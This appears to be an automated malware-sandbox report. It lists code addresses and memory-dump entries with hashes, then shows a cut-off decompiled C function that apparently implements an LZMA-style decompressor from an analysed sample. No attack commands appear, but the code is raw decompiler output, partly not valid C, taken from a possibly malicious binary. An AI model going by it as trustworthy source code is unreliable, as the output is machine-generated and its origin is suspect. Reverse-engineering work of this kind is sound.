                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f61
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00407063
                                                              0x0040701e
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x00407109
                                                              0x0040710c
                                                              0x0040700d
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00407013
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00407063
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e21
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x0040700d
                                                              0x0040708d
                                                              0x00407056

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                              • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                                              • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                              • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
